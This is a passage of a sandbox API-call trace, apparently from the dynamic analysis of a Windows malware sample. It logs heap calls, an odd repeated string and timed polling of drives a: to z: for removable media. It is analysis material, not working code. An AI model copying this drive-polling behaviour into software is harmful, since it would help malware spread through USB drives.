lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0215.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.612] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.612] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.612] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.612] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.612] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.612] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.612] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0215.612] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.612] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.612] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.612] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0215.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0215.613] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.613] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.613] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.613] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.614] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.614] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.614] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.614] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.614] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.614] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.614] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.615] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.615] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.615] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.615] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.615] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.616] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.616] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.616] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.616] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.616] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.616] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.617] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.617] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.617] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.617] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.617] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.617] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0215.617] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.618] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.618] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.618] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.618] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.618] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.618] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.618] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.618] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.618] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.618] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.618] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.618] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.618] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.618] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.618] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.618] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.618] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0215.618] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0215.618] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0215.618] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e60 [0215.618] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0215.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e60 | out: hHeap=0x12c0000) returned 1 [0215.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0215.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.619] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0215.619] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0215.619] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0215.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.619] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.619] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.619] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.619] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0215.619] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.619] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0215.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.620] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0215.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.620] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.620] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.620] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.620] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.620] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.621] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.621] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.621] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.621] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.621] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.621] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.621] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.622] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.622] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.622] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.622] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.622] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.622] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.623] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.623] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.623] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.623] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.623] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.623] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.624] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.624] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.624] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0215.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.624] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326120 [0215.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326120 | out: hHeap=0x12c0000) returned 1 [0215.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0215.625] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0215.625] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0215.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.625] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 1 [0215.626] TranslateMessage (lpMsg=0x7dfde4) returned 0 [0215.626] DispatchMessageW (lpMsg=0x7dfde4) returned 0x0 [0215.626] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.626] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.626] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.626] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0215.626] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.626] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.626] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0215.626] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.626] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.626] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.626] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.626] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0215.626] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.626] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.626] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.626] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.626] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.626] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.626] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.626] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.626] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.627] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.627] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0215.627] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0215.627] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.627] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.627] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.627] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.627] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.627] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.627] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.628] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.628] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.628] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.628] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.628] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.628] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.628] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.629] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.629] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.629] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.629] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.629] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.630] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.630] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.630] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.630] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.630] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.630] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.631] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.631] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.631] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0215.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.631] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0215.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e60 [0215.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e60 | out: hHeap=0x12c0000) returned 1 [0215.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0215.632] PeekMessageW (in: lpMsg=0x7dfb8c, 